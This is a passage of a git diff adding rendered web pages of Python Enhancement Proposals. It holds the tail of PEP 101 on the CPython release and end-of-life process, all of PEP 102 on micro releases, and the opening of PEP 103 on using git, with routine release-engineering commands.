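        if [ -n "$num" ] && grep -q "gh-issue: $num" Misc/NEWS.d/3.X.Y.rst; then
            echo "captured in 3.X.Y.rst, remove: $f"
        fi
    done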
  • +
  • Review and commit these changes:
    git commit -m 'Post release updates'
    +
    +
    +
  • +
  • If this is a new branch release (e.g. the first beta), +update the main branch to start development for the +following feature release. When finished, the main +branch will now build Python X.Y+1.
      +
    • First, set main up to be the next release, i.e. X.Y+1.a0:
      git checkout main
      +.../release-tools/release.py --bump 3.9.0a0
      +
      +
      +
    • +
    • Edit all version references in README.rst
    • +
    • Edit Doc/tutorial/interpreter.rst (two references to ‘[Pp]ython3x’, +one to ‘Python 3.x’, also make the date in the banner consistent).
    • +
    • Edit Doc/tutorial/stdlib.rst and Doc/tutorial/stdlib2.rst, which +have each one reference to ‘[Pp]ython3x’.
    • +
    • Add a new whatsnew/3.x.rst file (with the comment near the top +and the toplevel sections copied from the previous file) and +add it to the toctree in whatsnew/index.rst. But beware that +the initial whatsnew/3.x.rst checkin from previous releases +may be incorrect due to the initial midstream change to blurb +that propagates from release to release! Help break the cycle: if +necessary make the following change:
      -For full details, see the :source:`Misc/NEWS` file.
      ++For full details, see the :ref:`changelog <changelog>`.
      +
      +
      +
    • +
    • Update the version number in configure.ac and re-run autoconf.
    • +
    • Make sure the SOURCE_URI in Doc/tools/extensions/pyspecific.py +points to main.
    • +
    • Update the version numbers for the Windows builds +which have references to python38:
      ls PC/pyconfig.h.in PCbuild/rt.bat | xargs sed -i 's/python3\(\.\?\)[0-9]\+/python3\19/g'
      +
      +
      +
    • +
    • Edit the bug.yml and crash.yml issue templates in +.github/ISSUE_TEMPLATE/ to add the new branch to the +“versions” dropdown.
    • +
    • Commit these changes to the main branch:
      git status
      +git add ...
      +git commit -m 'Bump to 3.9.0a0'
      +
      +
      +
    • +
    +
  • +
  • Do another git status in this directory.

    You should not see any files listed, i.e. you had better not have any uncommitted changes in your working directory.
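    With a clean tree, the check and its expected result look something like this (the exact wording varies by git version; the branch name is illustrative):

    git status
    # On branch 3.X
    # nothing to commit, working tree clean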

    +
  • +
  • Commit and push to the main repo:
    # Do a dry run first.
    +
    +# For feature pre-releases prior to a **new branch** release,
    +#   i.e. a feature alpha release:
    +git push --dry-run --tags  git@github.com:python/cpython.git main
    +# If it looks OK, take the plunge.  There's no going back!
    +git push --tags  git@github.com:python/cpython.git main
    +
    +# For a **new branch** release, i.e. first beta:
    +git push --dry-run --tags  git@github.com:python/cpython.git 3.X
    +git push --dry-run --tags  git@github.com:python/cpython.git main
    +# If it looks OK, take the plunge.  There's no going back!
    +git push --tags  git@github.com:python/cpython.git 3.X
    +git push --tags  git@github.com:python/cpython.git main
    +
    +# For all other releases:
    +git push --dry-run --tags  git@github.com:python/cpython.git 3.X
    +# If it looks OK, take the plunge.  There's no going back!
    +git push --tags  git@github.com:python/cpython.git 3.X
    +
    +
    +
  • +
  • If this is a new branch release, add a Branch protection rule +for the newly created branch (3.X). Look at the values for the previous +release branch (3.X-1) and use them as a template. +https://github.com/python/cpython/settings/branches

    Also, add 3.x and needs backport to 3.X labels to the GitHub repo. +https://github.com/python/cpython/labels

    +
  • +
  • You can now re-enable enforcement of branch settings against administrators +on GitHub. Go back to the Settings | Branch page:

    https://github.com/python/cpython/settings/branches

    +

    “Edit” the settings for the branch you’re releasing on. +Re-check the “Include administrators” box and press the +“Save changes” button at the bottom.

    +
  • +
+

Now it’s time to twiddle the website. Almost none of this is automated, sorry.

+

To do these steps, you must have the permission to edit the website. If you +don’t have that, ask someone on pydotorg@python.org for the proper +permissions.

+
    +
  • Log in to https://www.python.org/admin
  • +
  • Create a new “release” for the release. Currently “Releases” are +sorted under “Downloads”.

    The easiest thing is probably to copy fields from an existing +Python release “page”, editing as you go.

    +

    You can use Markdown or +reStructured Text +to describe your release. The former is less verbose, while the latter has nifty +integration for things like referencing PEPs.

    +

    Leave the “Release page” field on the form empty.

    +
  • +
  • “Save” the release.
  • +
  • Populate the release with the downloadable files.

    Your friend and mine, Georg Brandl, made a lovely tool +called add_to_pydotorg.py. You can find it in the +python/release-tools repo (next to release.py). You run the +tool on downloads.nyc1.psf.io, like this:

    +
    AUTH_INFO=<username>:<python.org-api-key> python add_to_pydotorg.py <version>
    +
    +
    +

    This walks the correct download directory for <version>, looks for files marked with <version>, and populates the “Release Files” for the correct “release” on the web site with these files. Note that it clears the “Release Files” for the relevant version each time it’s run. You may run it from any directory you like, and you can run it as many times as you like if the files happen to change. Keep a copy in your home directory on dl-files and keep it fresh.

    +

    If new types of files are added to the release, someone will need to +update add_to_pydotorg.py so it recognizes these new files. +(It’s best to update add_to_pydotorg.py when file types +are removed, too.)

    +

    The script will also sign any remaining files that were not +signed with Sigstore until this point. Again, if this happens, +do use your @python.org address for this process. More info: +https://www.python.org/download/sigstore/

    +
  • +
  • In case the CDN already cached a version of the Downloads page +without the files present, you can invalidate the cache using:
    curl -X PURGE https://www.python.org/downloads/release/python-XXX/
    +
    +
    +
  • +
  • If this is a final release:
      +
    • Add the new version to the Python Documentation by Version +page https://www.python.org/doc/versions/ and +remove the current version from any ‘in development’ section.
    • +
    • For 3.X.Y, edit all the previous X.Y releases’ page(s) to +point to the new release. This includes the content field of the +Downloads -> Releases entry for the release:
      Note: Python 3.x.(y-1) has been superseded by
      +`Python 3.x.y </downloads/release/python-3xy/>`_.
      +
      +
      +

      And, for those releases having separate release page entries +(phasing these out?), update those pages as well, +e.g. download/releases/3.x.y:

      +
      Note: Python 3.x.(y-1) has been superseded by
      +`Python 3.x.y </download/releases/3.x.y/>`_.
      +
      +
      +
    • +
    • Update the “Current Pre-release Testing Versions” web page.

      There’s a page that lists all the currently-in-testing versions +of Python:

      + +

      Every time you make a release, one way or another you’ll +have to update this page:

      +
        +
      • If you’re releasing a version before 3.x.0, +you should add it to this page, removing the previous pre-release +of version 3.x as needed.
      • +
      • If you’re releasing 3.x.0 final, you need to remove the pre-release +version from this page.
      • +
      +

      This is in the “Pages” category on the Django-based website, and finding +it through that UI is kind of a chore. However! If you’re already logged +in to the admin interface (which, at this point, you should be), Django +will helpfully add a convenient “Edit this page” link to the top of the +page itself. So you can simply follow the link above, click on the +“Edit this page” link, and make your changes as needed. How convenient!

      +
    • +
    • If appropriate, update the “Python Documentation by Version” page: https://www.python.org/doc/versions/

      This lists all releases of Python by version number and links to their static (not built daily) online documentation. There’s a list at the bottom of in-development versions, which is where all alphas/betas/RCs should go. And yes, you should be able to click on the link above and then press the shiny, exciting “Edit this page” button.

      +
    • +
    +
  • +
  • Write the announcement on discuss.python.org. This is the +fuzzy bit because not much can be automated. You can use an earlier +announcement as a template, but edit it for content!
  • +
  • Once the announcement is up on Discourse, send an equivalent to the +following mailing lists: +
  • +
  • Also post the announcement to the +Python Insider blog. +To add a new entry, go to +your Blogger home page.
  • +
  • Update release PEPs +(e.g. 719) with the release dates.
  • +
  • Update the labels on https://github.com/python/cpython/issues:
      +
    • Flip all the deferred-blocker issues back to release-blocker +for the next release.
    • +
    • Review open issues, as this might find lurking showstopper bugs, +besides reminding people to fix the easy ones they forgot about.
    • +
    +
  • +
  • You can delete the remote release clone branch from your repo clone.
  • +
  • If this is a new branch release, you will need to ensure various +pieces of the development infrastructure are updated for the new branch. +These include:
      +
    • Update the issue tracker for the new branch: +add the new version to the versions list.
    • +
    • Update the devguide +to reflect the new branches and versions.
    • +
    • Create a PR to update the supported releases table on the +downloads page (see +python/pythondotorg#1302).
    • +
    • Ensure buildbots are defined for the new branch (contact Łukasz +or Zach Ware).
    • +
    • Ensure the various GitHub bots are updated, as needed, for the +new branch. In particular, make sure backporting to the new +branch works (contact the core-workflow team).
    • +
    • Review the most recent commit history for the main and new release +branches to identify and backport any merges that might have been made +to the main branch during the release engineering phase and that +should be in the release branch.
    • +
    • Verify that CI is working for new PRs for the main and new release +branches and that the release branch is properly protected (no direct +pushes, etc).
    • +
    • Verify that the online docs are building +properly (this may take up to 24 hours for a complete build on the website).
    • +
    +
  • +
+
+
+

What Next?

+
    +
  • Verify! Pretend you’re a user: download the files from www.python.org, and +make Python from it. This step is too easy to overlook, and on several +occasions we’ve had useless release files. Once a general server problem +caused mysterious corruption of all files; once the source tarball got +built incorrectly; more than once the file upload process on SF truncated +files; and so on.
  • +
  • Rejoice. Drink. Be Merry. Write a PEP like this one. Or be +like unto Guido and take A Vacation.
  • +
+

You’ve just made a Python release!

+
+
+

Moving to End-of-life

+

Under current policy, a release branch normally reaches end-of-life status +five years after its initial release. The policy is discussed in more detail +in the Python Developer’s Guide. +When end-of-life is reached, there are a number of tasks that need to be +performed either directly by you as release manager or by ensuring someone +else does them. Some of those tasks include:

+
    +
  • Optionally making a final release to publish any remaining unreleased +changes.
  • +
  • Freeze the state of the release branch by creating a tag of its current HEAD +and then deleting the branch from the CPython repo. The current HEAD should +be at or beyond the final security release for the branch:
    git fetch upstream
    +git tag --sign -m 'Final head of the former 3.3 branch' 3.3 upstream/3.3
    +git push upstream refs/tags/3.3
    +
    +
    +
  • +
  • If all looks good, delete the branch. This may require the assistance of +someone with repo administrator privileges:
    git push upstream --delete 3.3  # or perform from GitHub Settings page
    +
    +
    +
  • +
  • Remove the release from the list of “Active Python Releases” on the Downloads +page. To do this, log in to the admin page +for python.org, navigate to Boxes, +and edit the downloads-active-releases entry. Strip out the relevant +paragraph of HTML for your release. (You’ll probably have to do the curl -X PURGE +trick to purge the cache if you want to confirm you made the change correctly.)
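    For example (the URL is the public Downloads page; same PURGE technique as above):

    curl -X PURGE https://www.python.org/downloads/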
  • +
  • Add a retired notice to each release page on python.org for the retired branch. +For example: +
  • +
  • In the developer’s guide, +set the branch status to end-of-life +and update or remove references to the branch elsewhere in the devguide.
  • +
  • Retire the release from the issue tracker. Tasks include:
      +
    • update issues from this version to the next supported version
    • +
    • remove version label from list of versions
    • +
    • remove the needs backport to label for the retired version
    • +
    • review and dispose of open issues marked for this branch
    • +
    +
  • +
  • Run a final build of the online docs to add the end-of-life banner.
  • +
  • Announce the branch retirement in the usual places:
      +
    • discuss.python.org
    • +
    • mailing lists (python-dev, python-list, python-announcements)
    • +
    • Python Dev blog
    • +
    +
  • +
  • Enjoy your retirement and bask in the glow of a job well done!
  • +
+
+
+

Windows Notes

+

Windows has an MSI installer, various flavors of Windows have “special limitations”, and the Windows installer also packs precompiled “foreign” binaries (Tcl/Tk, expat, etc.).

+

The installer is tested as part of the Azure Pipeline. In the past, +those steps were performed manually. We’re keeping this for posterity.

+

Concurrent with uploading the installer, the WE installs Python from it twice: once into the default directory suggested by the installer, and later into a directory with embedded spaces in its name. For each installation, the WE runs the full regression suite from a DOS box, both with and without -O. For maintenance releases, the WE also tests whether upgrade installations succeed.

+

The WE also tries every shortcut created under Start -> Menu -> the +Python group. When trying IDLE this way, you need to verify that +Help -> Python Documentation works. When trying pydoc this way +(the “Module Docs” Start menu entry), make sure the “Start +Browser” button works, and make sure you can search for a random +module (like “random” <wink>) and then that the “go to selected” +button works.

+

It’s amazing how much can go wrong here – and even more amazing +how often last-second checkins break one of these things. If +you’re “the Windows geek”, keep in mind that you’re likely the +only person routinely testing on Windows, and that Windows is +simply a mess.

+

Repeat the testing for each target architecture. Try both an +Admin and a plain User (not Power User) account.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0101.rst

+

Last modified: 2024-11-26 06:56:41 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0102/index.html b/pep-0102/index.html new file mode 100644 index 00000000000..de1508f60ed --- /dev/null +++ b/pep-0102/index.html @@ -0,0 +1,549 @@
PEP 102 – Doing Python Micro Releases | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 102 – Doing Python Micro Releases

+
+
Author:
+
Anthony Baxter <anthony at interlink.com.au>, +Barry Warsaw <barry at python.org>, +Guido van Rossum <guido at python.org>
+
Status:
+
Superseded
+
Type:
+
Informational
+
Created:
+
09-Jan-2002
+
Post-History:
+

+
Superseded-By:
+
101
+
+
+
+
+
+

Replacement Note

+

Although the size of the to-do list in this PEP is much less scary than that in PEP 101, it turns out not to be enough justification for the duplication of information, and with it, the danger of one of the copies becoming out of date. Therefore, this PEP is no longer maintained, and micro releases are fully covered by PEP 101.

+
+
+

Abstract

+

Making a Python release is an arduous process that takes a +minimum of half a day’s work even for an experienced releaser. +Until recently, most – if not all – of that burden was borne by +Guido himself. But several recent releases have been performed by +other folks, so this PEP attempts to collect, in one place, all +the steps needed to make a Python bugfix release.

+

The major Python release process is covered in PEP 101 - this PEP +is just PEP 101, trimmed down to only include the bits that are +relevant for micro releases, a.k.a. patch, or bug fix releases.

+

It is organized as a recipe and you can actually print this out and +check items off as you complete them.

+
+
+

How to Make A Release

+

Here are the steps taken to make a Python release. Some steps are +more fuzzy than others because there’s little that can be +automated (e.g. writing the NEWS entries). Where a step is +usually performed by An Expert, the name of that expert is given. +Otherwise, assume the step is done by the Release Manager (RM), +the designated person performing the release. Almost every place +the RM is mentioned below, this step can also be done by the BDFL +of course!

+

XXX: We should include a dependency graph to illustrate the steps +that can be taken in parallel, or those that depend on other +steps.

+

We use the following conventions in the examples below. Where a +release number is given, it is of the form X.Y.MaA, e.g. 2.1.2c1 +for Python 2.1.2 release candidate 1, where “a” == alpha, “b” == +beta, “c” == release candidate. Final releases are tagged with +“releaseXYZ” in CVS. The micro releases are made from the +maintenance branch of the major release, e.g. Python 2.1.2 is made +from the release21-maint branch.

+
    +
  1. Send an email to python-dev@python.org indicating the release is +about to start.
  2. +
  3. Put a freeze on check-ins into the maintenance branch. At this point, nobody except the RM should make any commits to the branch (or his duly assigned agents, i.e. Guido the BDFL, Fred Drake for documentation, or Thomas Heller for Windows). If the RM screwed up and some desperate last minute change to the branch is necessary, it can mean extra work for Fred and Thomas. So try to avoid this!
  4. +
  5. On the branch, change Include/patchlevel.h in two places, to +reflect the new version number you’ve just created. You’ll want +to change the PY_VERSION macro, and one or several of the +version subpart macros just above PY_VERSION, as appropriate.
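    For illustration, after bumping 2.1.1 to 2.1.2 the affected macros would end up reading something like this (the macro names are the real ones from Include/patchlevel.h; the values are examples for this release):

    #define PY_MICRO_VERSION        2
    #define PY_RELEASE_LEVEL        PY_RELEASE_LEVEL_FINAL
    #define PY_VERSION              "2.1.2"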
  6. +
  7. Change the “%define version” line of Misc/RPM/python-2.3.spec to the +same string as PY_VERSION was changed to above. E.g:
    %define version 2.3.1
    +
    +
    +

    You also probably want to reset the %define release line +to ‘1pydotorg’ if it’s not already that.

    +
  8. +
  9. If you’re changing the version number for Python (e.g. from Python 2.1.1 to Python 2.1.2), you also need to update the README file, which has a big banner at the top proclaiming its identity. Don’t do this if you’re just releasing a new alpha or beta release, but /do/ do this if you’re releasing a new micro, minor or major release.
  10. +
  11. The LICENSE file also needs to be changed, due to several references to the release number. As for the README file, changing these is necessary for a new micro, minor or major release.

    The LICENSE file contains a table that describes the legal +heritage of Python; you should add an entry for the X.Y.Z +release you are now making. You should update this table in the +LICENSE file on the CVS trunk too.

    +
  12. +
  13. When the year changes, copyright legends need to be updated in +many places, including the README and LICENSE files.
  14. +
  15. For the Windows build, additional files have to be updated.

    PCbuild/BUILDno.txt contains the Windows build number; see the instructions in this file for how to change it. Saving the project file PCbuild/pythoncore.dsp results in a change to PCbuild/pythoncore.dsp as well.

    +

    PCbuild/python20.wse sets up the Windows installer version +resource (displayed when you right-click on the installer .exe +and select Properties), and also contains the Python version +number.

    +

    (Before version 2.3.2, it was required to manually edit +PC/python_nt.rc, this step is now automated by the build +process.)

    +
  16. +
  17. After starting the process, the most important thing to do next +is to update the Misc/NEWS file. Thomas will need this in order to +do the Windows release and he likes to stay up late. This step +can be pretty tedious, so it’s best to get to it immediately +after making the branch, or even before you’ve made the branch. +The sooner the better (but again, watch for new checkins up +until the release is made!)

    Add high level items new to this release. E.g. if we’re +releasing 2.2a3, there must be a section at the top of the file +explaining “What’s new in Python 2.2a3”. It will be followed by +a section entitled “What’s new in Python 2.2a2”.

    +

    Note that you /hope/ that as developers add new features to the +trunk, they’ve updated the NEWS file accordingly. You can’t be +positive, so double check. If you’re a Unix weenie, it helps to +verify with Thomas about changes on Windows, and Jack Jansen +about changes on the Mac.

    +

    This command should help you (but substitute the correct -r tag!):

    +
    % cvs log -rr22a1: | python Tools/scripts/logmerge.py > /tmp/news.txt
    +
    +
    +

    IOW, you’re printing out all the cvs log entries from the +previous release until now. You can then troll through the +news.txt file looking for interesting things to add to NEWS.

    +
  18. +
  19. Check your NEWS changes into the maintenance branch. It’s easy +to forget to update the release date in this file!
  20. +
  21. Check in any changes to IDLE’s NEWS.txt. Update the header in +Lib/idlelib/NEWS.txt to reflect its release version and date. +Update the IDLE version in Lib/idlelib/idlever.py to match.
  22. +
+
    +
  1. Once the release process has started, the documentation needs to +be built and posted on python.org according to the instructions +in PEP 101.

    Note that Fred is responsible both for merging doc changes from +the trunk to the branch AND for merging any branch changes from +the branch to the trunk during the cleaning up phase. +Basically, if it’s in Doc/ Fred will take care of it.

    +
  2. +
  3. Thomas compiles everything with MSVC 6.0 SP5, and moves the +python23.chm file into the src/chm directory. The installer +executable is then generated with Wise Installation System.

    The installer includes the MSVC 6.0 runtime in the files MSVCRT.DLL and MSVCIRT.DLL. It leads to disaster if these files are taken from the system directory of the machine where the installer is built; instead, it must absolutely be made sure that these files come from the VCREDIST.EXE redistributable package contained in the MSVC SP5 CD. VCREDIST.EXE must be unpacked with winzip, and the Wise Installation System prompts for the directory.

    +

    After building the installer, it should be opened with winzip, and the MS dlls extracted again and checked for the same version number as those unpacked from VCREDIST.EXE.

    +

    Thomas uploads this file to the starship. He then sends the RM +a notice which includes the location and MD5 checksum of the +Windows executable.

    +

    Note that Thomas’s creation of the Windows executable may generate +a few more commits on the branch. Thomas will be responsible for +merging Windows-specific changes from trunk to branch, and from +branch to trunk.

    +
  4. +
  5. Sean performs his Red Hat magic, generating a set of RPMs. He +uploads these files to python.org. He then sends the RM a notice +which includes the location and MD5 checksum of the RPMs.
  6. +
  7. It’s Build Time!

    Now, you’re ready to build the source tarball. First cd to your +working directory for the branch. E.g. +% cd …/python-22a3

    +
  8. +
  9. Do a “cvs update” in this directory. Do NOT include the -A flag!

    You should not see any “M” files, but you may see several “P” +and/or “U” files. I.e. you better not have any uncommitted +changes in your working directory, but you may pick up some of +Fred’s or Thomas’s last minute changes.

    +
  10. +
  11. Now tag the branch using a symbolic name like “rXYMaZ”, +e.g. r212
    % cvs tag r212
    +
    +
    +

    Be sure to tag only the python/dist/src subdirectory of the +Python CVS tree!

    +
  12. +
  13. Change to a neutral directory, i.e. one in which you can do a +fresh, virgin, cvs export of the branch. You will be creating a +new directory at this location, to be named “Python-X.Y.M”. Do +a CVS export of the tagged branch.
    % cd ~
    +% cvs -d cvs.sf.net:/cvsroot/python export -rr212 \
    +                      -d Python-2.1.2 python/dist/src
    +
    +
    +
  14. +
  15. Generate the tarball. Note that we’re not using the ‘z’ option on the tar command because 1) that’s only supported by GNU tar as far as we know, and 2) we’re going to max out the compression level, which isn’t a supported option. We generate both tar.gz and tar.bz2 formats, as the latter is about 1/6th smaller.
    % tar -cf - Python-2.1.2 | gzip -9 > Python-2.1.2.tgz
    +% tar -cf - Python-2.1.2 | bzip2 -9 > Python-2.1.2.tar.bz2
    +
    +
    +
  16. +
  17. Calculate the MD5 checksum of the tgz and tar.bz2 files you +just created
    % md5sum Python-2.1.2.tgz
    +
    +
    +

    Note that if you don’t have the md5sum program, there is a +Python replacement in the Tools/scripts/md5sum.py file.
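    Presumably it is invoked like md5sum itself (a guess at the usage; check the script before relying on it):

    % python Tools/scripts/md5sum.py Python-2.1.2.tgz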

    +
  18. +
  19. Create GPG signatures for each of the files.
    % gpg -ba Python-2.1.2.tgz
    +% gpg -ba Python-2.1.2.tar.bz2
    +% gpg -ba Python-2.1.2.exe
    +
    +
    +
  20. +
  21. Now you want to perform the very important step of checking the +tarball you just created, to make sure a completely clean, +virgin build passes the regression test. Here are the best +steps to take:
    % cd /tmp
    +% tar zxvf ~/Python-2.1.2.tgz
    +% cd Python-2.1.2
    +% ls
    +(Do things look reasonable?)
    +% ./configure
    +(Loads of configure output)
    +% make test
    +(Do all the expected tests pass?)
    +
    +
    +

    If the tests pass, then you can feel good that the tarball is +fine. If some of the tests fail, or anything else about the +freshly unpacked directory looks weird, you better stop now and +figure out what the problem is.

    +
  22. +
  23. You need to upload the tgz and the exe file to creosote.python.org. +This step can take a long time depending on your network +bandwidth. scp both files from your own machine to creosote.
  24. +
  25. While you’re waiting, you can start twiddling the web pages to +include the announcement.
      +
    1. In the top of the python.org web site CVS tree, create a +subdirectory for the X.Y.Z release. You can actually copy an +earlier patch release’s subdirectory, but be sure to delete +the X.Y.Z/CVS directory and “cvs add X.Y.Z”, for example:
      % cd .../pydotorg
      +% cp -r 2.2.2 2.2.3
      +% rm -rf 2.2.3/CVS
      +% cvs add 2.2.3
      +% cd 2.2.3
      +
      +
      +
    2. +
    3. Edit the files for content: usually you can globally replace +X.Ya(Z-1) with X.YaZ. However, you’ll need to think about the +“What’s New?” section.
    4. +
    5. Copy the Misc/NEWS file to NEWS.txt in the X.Y.Z directory for +python.org; this contains the “full scoop” of changes to +Python since the previous release for this version of Python.
    6. +
    7. Copy the .asc GPG signatures you created earlier here as well.
    8. +
    9. Also, update the MD5 checksums.
    10. +
    11. Preview the web page by doing a “make” or “make install” (as +long as you’ve created a new directory for this release!)
    12. +
    13. Similarly, edit the ../index.ht file, i.e. the python.org home +page. In the Big Blue Announcement Block, move the paragraph +for the new version up to the top and boldify the phrase +“Python X.YaZ is out”. Edit for content, and preview locally, +but do NOT do a “make install” yet!
    14. +
    +
  26. +
  27. Now we’re waiting for the scp to creosote to finish. Da de da, +da de dum, hmm, hmm, dum de dum.
  28. +
  29. Once that’s done you need to go to creosote.python.org and move +all the files in place over there. Our policy is that every +Python version gets its own directory, but each directory may +contain several releases. We keep all old releases, moving them +into a “prev” subdirectory when we have a new release.

    So, there’s a directory called “2.2” which contains +Python-2.2a2.exe and Python-2.2a2.tgz, along with a “prev” +subdirectory containing Python-2.2a1.exe and Python-2.2a1.tgz.

    +

    So…

    +
      +
    1. On creosote, cd to ~ftp/pub/python/X.Y creating it if +necessary.
    2. +
    3. Move the previous release files to a directory called “prev” +creating the directory if necessary (make sure the directory +has g+ws bits on). If this is the first alpha release of a +new Python version, skip this step.
    4. +
    5. Move the .tgz file and the .exe file to this directory. Make +sure they are world readable. They should also be group +writable, and group-owned by webmaster.
    6. +
    7. md5sum the files and make sure they got uploaded intact.
    8. +
    +
  30. +
  31. Update the X.Y/bugs.ht file if necessary. It is best to get BDFL input for this step.
  32. +
  33. Go up to the parent directory (i.e. the root of the web page hierarchy) and do a “make install” there. Your release is now live!
  34. +
  35. Now it’s time to write the announcement for the mailing lists. +This is the fuzzy bit because not much can be automated. You +can use one of Guido’s earlier announcements as a template, but +please edit it for content!

    Once the announcement is ready, send it to the following +addresses:

    +
    python-list@python.org
    +python-announce@python.org
    +python-dev@python.org
    +
    +
    +
  36. +
  37. Send a SourceForge News Item about the release. From the +project’s “menu bar”, select the “News” link; once in News, +select the “Submit” link. Type a suitable subject (e.g. “Python +2.2c1 released” :-) in the Subject box, add some text to the +Details box (at the very least including the release URL at +www.python.org and the fact that you’re happy with the release) +and click the SUBMIT button.

    Feel free to remove any old news items.

    +
  38. +
+

Now it’s time to do some cleanup. These steps are very important!

+
    +
  1. Edit the file Include/patchlevel.h so that the PY_VERSION +string says something like “X.YaZ+”. Note the trailing ‘+’ +indicating that the trunk is going to be moving forward with +development. E.g. the line should look like:
    #define PY_VERSION              "2.1.2+"
    +
    +
    +

    Make sure that the other PY_ version macros contain the +correct values. Commit this change.

    +
  2. +
  3. For the extra paranoid, do a completely clean test of the +release. This includes downloading the tarball from +www.python.org.
  4. +
  5. Make sure the md5 checksums match. Then unpack the tarball, +and do a clean make test.
    % make distclean
    +% ./configure
    +% make test
    +
    +
    +

    This ensures that the regression test suite passes. If not, you screwed up somewhere!

    +
  6. +
+

Step 5 …

+

Verify! This can be interleaved with Step 4. Pretend you’re a +user: download the files from python.org, and make Python from +it. This step is too easy to overlook, and on several occasions +we’ve had useless release files. Once a general server problem +caused mysterious corruption of all files; once the source tarball +got built incorrectly; more than once the file upload process on +SF truncated files; and so on.

+
+
+

What Next?

+

Rejoice. Drink. Be Merry. Write a PEP like this one. Or be +like unto Guido and take A Vacation.

+

You’ve just made a Python release!

+

Actually, there is one more step. You should turn over ownership +of the branch to Jack Jansen. All this means is that now he will +be responsible for making commits to the branch. He’s going to +use this to build the MacOS versions. He may send you information +about the Mac release that should be merged into the informational +pages on www.python.org. When he’s done, he’ll tag the branch +something like “rX.YaZ-mac”. He’ll also be responsible for +merging any Mac-related changes back into the trunk.

+
+
+

Final Release Notes

+

The Final release of any major release, e.g. Python 2.2 final, has +special requirements, specifically because it will be one of the +longest lived releases (i.e. betas don’t last more than a couple +of weeks, but final releases can last for years!).

+

For this reason we want to have a higher coordination between the +three major releases: Windows, Mac, and source. The Windows and +source releases benefit from the close proximity of the respective +release-bots. But the Mac-bot, Jack Jansen, is 6 hours away. So +we add this extra step to the release process for a final +release:

+
    +
  1. Hold up the final release until Jack approves, or until we +lose patience <wink>.
  2. +
+

The python.org site also needs some tweaking when a new bugfix release +is issued.

+
    +
  1. The documentation should be installed at doc/<version>/.
  2. +
  3. Add a link from doc/<previous-minor-release>/index.ht to the +documentation for the new version.
  4. +
  5. All older doc/<old-release>/index.ht files should be updated to +point to the documentation for the new version.
  6. +
  7. /robots.txt should be modified to prevent the old version’s +documentation from being crawled by search engines.
  8. +
+
+
+

Windows Notes

+

Windows has a GUI installer, various flavors of Windows have +“special limitations”, and the Windows installer also packs +precompiled “foreign” binaries (Tcl/Tk, expat, etc). So Windows +testing is tiresome but very necessary.

+

Concurrent with uploading the installer, Thomas installs Python from it twice: once into the default directory suggested by the installer, and later into a directory with embedded spaces in its name. For each installation, he runs the full regression suite from a DOS box, both with and without -O.

+

He also tries every shortcut created under Start -> Menu -> the +Python group. When trying IDLE this way, you need to verify that +Help -> Python Documentation works. When trying pydoc this way +(the “Module Docs” Start menu entry), make sure the “Start +Browser” button works, and make sure you can search for a random +module (Thomas uses “random” <wink>) and then that the “go to +selected” button works.

+

It’s amazing how much can go wrong here – and even more amazing +how often last-second checkins break one of these things. If +you’re “the Windows geek”, keep in mind that you’re likely the +only person routinely testing on Windows, and that Windows is +simply a mess.

+

Repeat all of the above on at least one flavor of Win9x, and one +of NT/2000/XP. On NT/2000/XP, try both an Admin and a plain User +(not Power User) account.

+

WRT Step 5 above (verify the release media), since by the time +release files are ready to download Thomas has generally run many +Windows tests on the installer he uploaded, he usually doesn’t do +anything for Step 5 except a full byte-comparison (“fc /b” if +using a Windows shell) of the downloaded file against the file he +uploaded.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0102.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0103/index.html b/pep-0103/index.html new file mode 100644 index 00000000000..1f68a7f0be7 --- /dev/null +++ b/pep-0103/index.html @@ -0,0 +1,1107 @@
PEP 103 – Collecting information about git | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 103 – Collecting information about git

+
+
Author:
+
Oleg Broytman <phd at phdru.name>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
01-Jun-2015
+
Post-History:
+
12-Sep-2015
+
+
+
+
+
+

Important

+

This PEP has been withdrawn.

+


+

It is too generic and doesn’t really deal +with Python development. It is no longer updated.

+

The content was moved to Python Wiki. Make further updates in the +wiki.

+

+
+
+

Abstract

+

This Informational PEP collects information about git. There is, of +course, a lot of documentation for git, so the PEP concentrates on +more complex (and more related to Python development) issues, +scenarios and examples.

+

The plan is to extend the PEP in the future, collecting information about the equivalence of Mercurial and git scenarios to help migrate Python development from Mercurial to git.

+

The author of the PEP doesn’t currently plan to write a Process PEP on migrating Python development from Mercurial to git.

+
+
+

Documentation

+

Git is accompanied by a lot of documentation, both online and offline.

+
+

Documentation for starters

+

Git Tutorial: part 1, +part 2.

+

Git User’s manual. +Everyday GIT With 20 Commands Or So. +Git workflows.

+
+
+

Advanced documentation

+

Git Magic, +with a number of translations.

+

Pro Git. The Book about git. Buy it at +Amazon or download in PDF, mobi, or ePub form. It has translations to +many different languages. Download Russian translation from GArik.

+

Git Wiki.

+

Git Buch (German).

+
+
+

Offline documentation

+

Git has builtin help: run git help $TOPIC. For example, run +git help git or git help help.

+
+
+
+

Quick start

+
+

Download and installation

+

Unix users: download and install using your package manager.

+

Microsoft Windows: download git-for-windows.

+

MacOS X: use git installed with XCode or download from MacPorts or +git-osx-installer or +install git with Homebrew: brew install git.

+

git-cola (repository) is a Git GUI written in +Python and GPL licensed. Linux, Windows, MacOS X.

+

TortoiseGit is a Windows Shell Interface +to Git based on TortoiseSVN; open source.

+
+
+

Initial configuration

+

This simple code often appears in documentation, but it is important, so let’s repeat it here. Git stores author and committer names/emails in every commit, so configure your real name and preferred email:

+
$ git config --global user.name "User Name"
+$ git config --global user.email user.name@example.org
+
+
+
+
+
+

Examples in this PEP

+

Examples of git commands in this PEP use the following approach. It is supposed that you, the user, work with a local repository named python that has an upstream remote repo named origin. Your local repo has two branches v1 and master. For most examples the currently checked out branch is master. That is, it’s assumed you have done something like this:

+
$ git clone https://git.python.org/python.git
+$ cd python
+$ git branch v1 origin/v1
+
+
+

The first command clones remote repository into local directory +python, creates a new local branch master, sets +remotes/origin/master as its upstream remote-tracking branch and +checks it out into the working directory.

+

The last command creates a new local branch v1 and sets +remotes/origin/v1 as its upstream remote-tracking branch.

+

The same result can be achieved with commands:

+
$ git clone -b v1 https://git.python.org/python.git
+$ cd python
